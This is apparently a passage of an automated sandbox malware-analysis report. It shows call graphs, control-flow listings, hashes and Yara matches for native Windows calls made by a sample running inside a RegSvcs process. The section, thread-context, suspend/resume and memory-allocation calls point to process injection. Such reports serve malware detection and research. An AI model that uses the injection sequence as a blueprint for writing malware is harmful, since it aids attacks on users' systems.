95931->95915 95933->95921 95934->95931 95937 4180ad 95935->95937 95960 41851b 95937->95960 95961 423493 95937->95961 95938 41814c 95938->95960 95964 413e93 95938->95964 95940 4181ba 95941 42a3e3 2 API calls 95940->95941 95940->95960 95943 4181d2 95941->95943 95942 418204 95944 41a5e3 3 API calls 95942->95944 95948 41820b 95942->95948 95943->95942 95977 406ca3 95943->95977 95945 418244 95944->95945 95947 427e93 2 API calls 95945->95947 95945->95960 95947->95948 95948->95960 95981 427983 95948->95981 95950 4182a1 95990 427a03 95950->95990 95952 4182c1 95953 4184aa 95952->95953 95999 406d13 95952->95999 95954 427b03 2 API calls 95953->95954 95956 4184cd 95953->95956 95954->95956 95958 4184ea 95956->95958 96003 41a7b3 95956->96003 95959 428933 2 API calls 95958->95959 95959->95960 95960->95873 96007 42a353 95961->96007 95963 4234b4 95963->95938 95965 413ef9 95964->95965 95970 413eb2 95964->95970 95966 414007 95965->95966 95976 413fd0 95965->95976 96023 413633 95965->96023 95966->95940 95969 413fe4 95969->95966 96041 41a853 LdrLoadDll RtlFreeHeap LdrInitializeThunk 95969->96041 95970->95965 95970->95966 95971 41a7b3 2 API calls 95970->95971 95971->95970 95973 413ffd 95973->95940 95974 413f36 95974->95976 96036 4138f3 95974->96036 95976->95966 96040 41a853 LdrLoadDll RtlFreeHeap LdrInitializeThunk 95976->96040 95978 406cd3 95977->95978 95979 41a7b3 2 API calls 95978->95979 95980 406cf4 95978->95980 95979->95978 95980->95942 95982 4279d3 95981->95982 95983 4279a1 95981->95983 95984 4295c3 LdrLoadDll 95982->95984 95985 4295c3 LdrLoadDll 95983->95985 95986 4279e9 95984->95986 95987 4279bb 95985->95987 95986->95950 96056 409f63 95987->96056 95989 4279cc 95989->95950 95991 427a53 95990->95991 95992 427a21 95990->95992 95993 4295c3 LdrLoadDll 95991->95993 95994 4295c3 LdrLoadDll 95992->95994 95995 427a69 95993->95995 95996 427a3b 95994->95996 95995->95952 96060 40a173 95996->96060 95998 427a4c 95998->95952 96001 406d33 95999->96001 96000 41a7b3 2 API calls 96000->96001 96001->96000 96002 406d53 96001->96002 96002->95953 96004 41a7c6 96003->96004 96064 427c23 96004->96064 96006 41a7f1 96006->95956 96010 428703 96007->96010 96009 42a384 96009->95963 96011 428766 96010->96011 96012 428724 96010->96012 96013 4295c3 LdrLoadDll 96011->96013 96014 4295c3 LdrLoadDll 96012->96014 96017 42877c 96013->96017 96015 42873e 96014->96015 96019 40b6b3 96015->96019 96017->96009 96018 42875f 96018->96009 96022 40b6d8 96019->96022 96020 40b7f5 NtAllocateVirtualMemory 96021 40b820 96020->96021 96021->96018 96022->96020 96024 413643 96023->96024 96025 41363e 96023->96025 96026 42a353 2 API calls 96024->96026 96025->95974 96033 413668 96026->96033 96027 4136cf 96027->95974 96029 4136d5 96030 4136ff 96029->96030 96032 4287f3 2 API calls 96029->96032 96030->95974 96034 4136f0 96032->96034 96033->96027 96033->96029 96035 42a353 2 API calls 96033->96035 96042 427ca3 96033->96042 96048 4287f3 96033->96048 96034->95974 96035->96033 96037 41390f 96036->96037 96038 4287f3 2 API calls 96037->96038 96039 413915 96038->96039 96039->95976 96040->95969 96041->95973 96043 427cbd 96042->96043 96044 4295c3 LdrLoadDll 96043->96044 96045 427cce 96044->96045 96054 14a2df0 LdrInitializeThunk 96045->96054 96046 427ce5 96046->96033 96049 42880d 96048->96049 96050 4295c3 LdrLoadDll 96049->96050 96051 42881e 96050->96051 96055 14a2c70 LdrInitializeThunk 96051->96055 96052 428835 96052->96033 96054->96046 96055->96052 96059 409f88 96056->96059 96057 40a0a5 NtGetContextThread 96058 40a0c0 96057->96058 96058->95989 96059->96057 96063 40a198 96060->96063 96061 40a2b5 NtSetContextThread 96062 40a2d0 96061->96062 96062->95998 96063->96061 96065 427c76 96064->96065 96066 427c44 96064->96066 96068 4295c3 LdrLoadDll 96065->96068 96067 4295c3 LdrLoadDll 96066->96067 96069 427c5e 96067->96069 96070 427c8c 96068->96070 96073 40b293 96069->96073 96070->96006 96072 427c6f 96072->96006 96076 40b2b8 96073->96076 96074 40b3d5 NtDelayExecution 96075 40b3f1 96074->96075 96075->96072 96076->96074 96077 418738 96078 4285d3 2 API calls 96077->96078 96079 418742 96078->96079 95656 14a2b60 LdrInitializeThunk

                                                                                                                              Executed Functions

                                                                                                                              Function 0040A9C3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,dn@,?,?,?,00000000), ref: 0040AB2D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionView
                                                                                                                              • String ID: dn@$dn@
                                                                                                                              • API String ID: 1323581903-1706352071
                                                                                                                              • Opcode ID: fb6e65454f31f31e21a458745f26c9e500a48d3f4ca65e249766e07491ab640b
                                                                                                                              • Instruction ID: 83a814acbb685b77b6810d9376fdb748afa93211dbf841ccc177d53d2bace50f
                                                                                                                              • Opcode Fuzzy Hash: fb6e65454f31f31e21a458745f26c9e500a48d3f4ca65e249766e07491ab640b
                                                                                                                              • Instruction Fuzzy Hash: 5C715C71E04248DFCB04CFA9C890AEEBBF2BF49304F18816AE559B7381D638A951CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040A7A3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 87 40a7a3-40a7c2 88 40a7c8-40a807 call 409803 87->88 89 40a7c3 call 4097f3 87->89 92 40a8e5-40a90e NtCreateSection 88->92 93 40a80d-40a852 call 409893 call 42b9e2 call 409763 call 42b9e2 88->93 89->88 95 40a914-40a91b 92->95 96 40a9ab-40a9b7 92->96 115 40a85d-40a863 93->115 98 40a926-40a92c 95->98 99 40a954-40a958 98->99 100 40a92e-40a952 98->100 103 40a99a-40a9a8 call 409893 99->103 104 40a95a-40a961 99->104 100->98 103->96 106 40a96c-40a972 104->106 106->103 109 40a974-40a998 106->109 109->106 116 40a865-40a889 115->116 117 40a88b-40a88f 115->117 116->115 117->92 118 40a891-40a8ac 117->118 120 40a8b7-40a8bd 118->120 120->92 121 40a8bf-40a8e3 120->121 121->120
                                                                                                                              APIs
                                                                                                                              • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,!n@,00000000,?,?,08000000), ref: 0040A901
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateSection
                                                                                                                              • String ID: !n@
                                                                                                                              • API String ID: 2449625523-1265431164
                                                                                                                              • Opcode ID: 6bd4d83ee47ceaa75d52cdd63ca5d5f621e47ad02fb05d4f576345a3f8b75b31
                                                                                                                              • Instruction ID: ce495b3b561869dbc8fc36b938cc52476fbb54aa7ab0238764ec94916651f4e6
                                                                                                                              • Opcode Fuzzy Hash: 6bd4d83ee47ceaa75d52cdd63ca5d5f621e47ad02fb05d4f576345a3f8b75b31
                                                                                                                              • Instruction Fuzzy Hash: 28714DB1E04258DFCB04DFA9C490AEDBBF1BF89304F18806AE859B7341D638A952CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040ABF3 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 146 40abf3-40ac12 147 40ac18-40ac57 call 409803 146->147 148 40ac13 call 4097f3 146->148 151 40ad35-40ad6e NtCreateFile 147->151 152 40ac5d-40aca2 call 409893 call 42b9e2 call 409763 call 42b9e2 147->152 148->147 153 40ad74-40ad7b 151->153 154 40ae0b-40ae17 151->154 174 40acad-40acb3 152->174 156 40ad86-40ad8c 153->156 158 40adb4-40adb8 156->158 159 40ad8e-40adb2 156->159 162 40adfa-40ae08 call 409893 158->162 163 40adba-40adc1 158->163 159->156 162->154 165 40adcc-40add2 163->165 165->162 168 40add4-40adf8 165->168 168->165 175 40acb5-40acd9 174->175 176 40acdb-40acdf 174->176 175->174 176->151 178 40ace1-40acfc 176->178 179 40ad07-40ad0d 178->179 179->151 180 40ad0f-40ad33 179->180 180->179
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AD61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 269faf619371c3f58e2e25edb940594807b334e9e7e360ba232f02bfdf2ea9aa
                                                                                                                              • Instruction ID: f14eb1a64331bb52a8e8855b640313b0b1895f6e890bdce768e22456816ce4dd
                                                                                                                              • Opcode Fuzzy Hash: 269faf619371c3f58e2e25edb940594807b334e9e7e360ba232f02bfdf2ea9aa
                                                                                                                              • Instruction Fuzzy Hash: 9E814DB1E04258DFCB04CFA9C490AEDBBF6AF4D304F18816AE449B7341D638A952CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040AE23 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 182 40ae23-40ae87 call 4097f3 call 409803 187 40af65-40af96 NtReadFile 182->187 188 40ae8d-40aed2 call 409893 call 42b9e2 call 409763 call 42b9e2 182->188 190 40b033-40b03f 187->190 191 40af9c-40afa3 187->191 210 40aedd-40aee3 188->210 193 40afae-40afb4 191->193 195 40afb6-40afda 193->195 196 40afdc-40afe0 193->196 195->193 199 40b022-40b030 call 409893 196->199 200 40afe2-40afe9 196->200 199->190 203 40aff4-40affa 200->203 203->199 204 40affc-40b020 203->204 204->203 211 40aee5-40af09 210->211 212 40af0b-40af0f 210->212 211->210 212->187 214 40af11-40af2c 212->214 215 40af37-40af3d 214->215 215->187 216 40af3f-40af63 215->216 216->215
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF89
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 98473d7fb557d2295a68941d0b0f09a85a55da3a770275fd10d5b54c690f7971
                                                                                                                              • Instruction ID: 0beaa5dd09238c7edd4954dbf8eb46c0cde398cd49cc1eb366be55cda25cee35
                                                                                                                              • Opcode Fuzzy Hash: 98473d7fb557d2295a68941d0b0f09a85a55da3a770275fd10d5b54c690f7971
                                                                                                                              • Instruction Fuzzy Hash: 9F713BB1E04258DFCB04CFA9C890AEEBBF5BF4D304F18806AE459B7341D638A952CB55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040B6B3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 218 40b6b3-40b6d2 219 40b6d8-40b717 call 409803 218->219 220 40b6d3 call 4097f3 218->220 223 40b7f5-40b81a NtAllocateVirtualMemory 219->223 224 40b71d-40b762 call 409893 call 42b9e2 call 409763 call 42b9e2 219->224 220->219 226 40b820-40b827 223->226 227 40b8b7-40b8c3 223->227 247 40b76d-40b773 224->247 229 40b832-40b838 226->229 231 40b860-40b864 229->231 232 40b83a-40b85e 229->232 235 40b8a6-40b8b4 call 409893 231->235 236 40b866-40b86d 231->236 232->229 235->227 239 40b878-40b87e 236->239 239->235 240 40b880-40b8a4 239->240 240->239 248 40b775-40b799 247->248 249 40b79b-40b79f 247->249 248->247 249->223 250 40b7a1-40b7bc 249->250 252 40b7c7-40b7cd 250->252 252->223 253 40b7cf-40b7f3 252->253 253->252
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B80D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: 1ac9d6d2b11310dafed3ec32fe3bba0151b125e011b9a49dd9478efdfa4473a6
                                                                                                                              • Instruction ID: fe0ce7db222c1d8eb0fe099feec4cd10b543f912076bb5620a1e9d4cb4753506
                                                                                                                              • Opcode Fuzzy Hash: 1ac9d6d2b11310dafed3ec32fe3bba0151b125e011b9a49dd9478efdfa4473a6
                                                                                                                              • Instruction Fuzzy Hash: 02712B71E04158DFCB04CFA9C590AEDBBF5AF89304F18806AE459B7351D738A942CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040A173 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 328 40a173-40a1d7 call 4097f3 call 409803 333 40a2b5-40a2ca NtSetContextThread 328->333 334 40a1dd-40a222 call 409893 call 42b9e2 call 409763 call 42b9e2 328->334 336 40a2d0-40a2d7 333->336 337 40a367-40a373 333->337 356 40a22d-40a233 334->356 339 40a2e2-40a2e8 336->339 341 40a310-40a314 339->341 342 40a2ea-40a30e 339->342 345 40a356-40a364 call 409893 341->345 346 40a316-40a31d 341->346 342->339 345->337 349 40a328-40a32e 346->349 349->345 352 40a330-40a354 349->352 352->349 357 40a235-40a259 356->357 358 40a25b-40a25f 356->358 357->356 358->333 359 40a261-40a27c 358->359 361 40a287-40a28d 359->361 361->333 362 40a28f-40a2b3 361->362 362->361
                                                                                                                              APIs
                                                                                                                              • NtSetContextThread.NTDLL(?,?), ref: 0040A2BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1591575202-0
                                                                                                                              • Opcode ID: 25b398d9a6a798ef72eb869fd76502e4b0c9cf1f1051236a5c0430f365006e85
                                                                                                                              • Instruction ID: 6a6dc76597140017372b1d538b88ab95162cc3c9016f9a0dfc8cad79773124ab
                                                                                                                              • Opcode Fuzzy Hash: 25b398d9a6a798ef72eb869fd76502e4b0c9cf1f1051236a5c0430f365006e85
                                                                                                                              • Instruction Fuzzy Hash: 64714D71E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7381D638A951DF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040B293 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtDelayExecution.NTDLL(0041A7F1,?,?,?,00000000), ref: 0040B3DE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DelayExecution
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1249177460-0
                                                                                                                              • Opcode ID: 5f1c073d5a4ff4b444335385aa75158bb53d24fa1f0392a1284643a110bb535a
                                                                                                                              • Instruction ID: 402c61849e0c0f7d0f7d82df15a61a001b6bd945b466c794d02df4329930ffe0
                                                                                                                              • Opcode Fuzzy Hash: 5f1c073d5a4ff4b444335385aa75158bb53d24fa1f0392a1284643a110bb535a
                                                                                                                              • Instruction Fuzzy Hash: E5712D71D04158DFCB04CFA9D490AEDBBF1AF49314F1880AAE855B7381D738AA42DB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040A383 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 364 40a383-40a3e7 call 4097f3 call 409803 369 40a4c5-40a4da NtResumeThread 364->369 370 40a3ed-40a432 call 409893 call 42b9e2 call 409763 call 42b9e2 364->370 372 40a4e0-40a4e7 369->372 373 40a577-40a583 369->373 392 40a43d-40a443 370->392 375 40a4f2-40a4f8 372->375 377 40a520-40a524 375->377 378 40a4fa-40a51e 375->378 381 40a566-40a574 call 409893 377->381 382 40a526-40a52d 377->382 378->375 381->373 384 40a538-40a53e 382->384 384->381 388 40a540-40a564 384->388 388->384 393 40a445-40a469 392->393 394 40a46b-40a46f 392->394 393->392 394->369 395 40a471-40a48c 394->395 397 40a497-40a49d 395->397 397->369 398 40a49f-40a4c3 397->398 398->397
                                                                                                                              APIs
                                                                                                                              • NtResumeThread.NTDLL(00406F05,?,?,?,?), ref: 0040A4CD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: db8da98aaa5b8167ec181ef168eafdd788ef56a9bcfa16cf81b298b2d820e1d4
                                                                                                                              • Instruction ID: 7456a2d5a560eaf50c033e48078aa5ce2dc3ed1382d0f5b948d32e13735b3adf
                                                                                                                              • Opcode Fuzzy Hash: db8da98aaa5b8167ec181ef168eafdd788ef56a9bcfa16cf81b298b2d820e1d4
                                                                                                                              • Instruction Fuzzy Hash: 14717F75E04258DFCB04CFA9D890AEDBBF1BF49304F18806AE459B7381D638A952CF55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00409D53 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 255 409d53-409d72 256 409d78-409db7 call 409803 255->256 257 409d73 call 4097f3 255->257 260 409e95-409eaa NtSuspendThread 256->260 261 409dbd-409e02 call 409893 call 42b9e2 call 409763 call 42b9e2 256->261 257->256 263 409eb0-409eb7 260->263 264 409f47-409f53 260->264 284 409e0d-409e13 261->284 266 409ec2-409ec8 263->266 267 409ef0-409ef4 266->267 268 409eca-409eee 266->268 270 409f36-409f44 call 409893 267->270 271 409ef6-409efd 267->271 268->266 270->264 274 409f08-409f0e 271->274 274->270 280 409f10-409f34 274->280 280->274 285 409e15-409e39 284->285 286 409e3b-409e3f 284->286 285->284 286->260 288 409e41-409e5c 286->288 289 409e67-409e6d 288->289 289->260 290 409e6f-409e93 289->290 290->289
                                                                                                                              APIs
                                                                                                                              • NtSuspendThread.NTDLL(?,?), ref: 00409E9D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: SuspendThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3178671153-0
                                                                                                                              • Opcode ID: 542633fa72b0620a3416b6bc305a684cbd9173e3e88c174bd1d097386e2aa372
                                                                                                                              • Instruction ID: a18d80a6127605060e949f8b43330e2f742eb7dc9ff56a41aadffcb25826fdfb
                                                                                                                              • Opcode Fuzzy Hash: 542633fa72b0620a3416b6bc305a684cbd9173e3e88c174bd1d097386e2aa372
                                                                                                                              • Instruction Fuzzy Hash: 1F713C71E04158DFCB05CFA9C490AEDBBF1BF49304F1880AAE459B7382D638AD42DB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00409F63 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 292 409f63-409f82 293 409f88-409fc7 call 409803 292->293 294 409f83 call 4097f3 292->294 297 40a0a5-40a0ba NtGetContextThread 293->297 298 409fcd-40a012 call 409893 call 42b9e2 call 409763 call 42b9e2 293->298 294->293 299 40a0c0-40a0c7 297->299 300 40a157-40a163 297->300 320 40a01d-40a023 298->320 303 40a0d2-40a0d8 299->303 305 40a100-40a104 303->305 306 40a0da-40a0fe 303->306 308 40a146-40a154 call 409893 305->308 309 40a106-40a10d 305->309 306->303 308->300 312 40a118-40a11e 309->312 312->308 315 40a120-40a144 312->315 315->312 321 40a025-40a049 320->321 322 40a04b-40a04f 320->322 321->320 322->297 324 40a051-40a06c 322->324 325 40a077-40a07d 324->325 325->297 326 40a07f-40a0a3 325->326 326->325
                                                                                                                              APIs
                                                                                                                              • NtGetContextThread.NTDLL(?,?), ref: 0040A0AD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1591575202-0
                                                                                                                              • Opcode ID: aa83a82bf0fc778386d57edc80bbf3dae548785cea6c28dde3387bcb9055b0f5
                                                                                                                              • Instruction ID: a22024bab7e4a10dc82285de41e07efcc03ae54b57d38ca20f882849651eb668
                                                                                                                              • Opcode Fuzzy Hash: aa83a82bf0fc778386d57edc80bbf3dae548785cea6c28dde3387bcb9055b0f5
                                                                                                                              • Instruction Fuzzy Hash: 7E713CB1E04258DFCB04CFA9C891AEDBBF1BF49304F18806AE455B7381D638A952DB55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00417553 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004175C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                                                              • Instruction ID: b31a2ad70a25c5b872769859c47bb6745bd4f82caac91601ca9b60a1fb6c03fb
                                                                                                                              • Opcode Fuzzy Hash: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                                                              • Instruction Fuzzy Hash: BB015EB1E0020DBBDB10DAE1DC42FDEB7B8AB14308F0081AAE90897240F635EB448B95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004285D3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(0041A798,?,?,00000000,?,0041A798,?,?,?,?,?,?,?,?,00000000,?), ref: 0042860A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: a08fca5580a631a550be9335b754077320016150a14adcbc7aded5e184d4430a
                                                                                                                              • Instruction ID: 63c3855c1ee8064f7fefbc51328cabf29162a6524d674791699fc45a0242d641
                                                                                                                              • Opcode Fuzzy Hash: a08fca5580a631a550be9335b754077320016150a14adcbc7aded5e184d4430a
                                                                                                                              • Instruction Fuzzy Hash: 35E04F772002147BD510BA5ADC01F9777ACDFC5710F408419FA4867142C674BA0087E5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 922c6e2acdb1897f6abc048e5dbf486ddf002b7b813e05e037677e145c7fa944
                                                                                                                              • Instruction ID: 6b5eb3f87b8f772ede388a199fa686bc6e8a1b13958d672c2eb85771c647025b
                                                                                                                              • Opcode Fuzzy Hash: 922c6e2acdb1897f6abc048e5dbf486ddf002b7b813e05e037677e145c7fa944
                                                                                                                              • Instruction Fuzzy Hash: C690026120240103410571584854656400E97F4201B55C022E1015591DC63589916635
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 38bfd7721870e97a8d84264c8f4d7ca44c754e2936d97139d5209905344d27ca
                                                                                                                              • Instruction ID: e13165985b3b0affc576b380d479a6d487f3fa06bb7d2080261e045dbb865702
                                                                                                                              • Opcode Fuzzy Hash: 38bfd7721870e97a8d84264c8f4d7ca44c754e2936d97139d5209905344d27ca
                                                                                                                              • Instruction Fuzzy Hash: 3690023120140513D11171584944747000D97E4241F95C413A0425559DD7668A52A631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
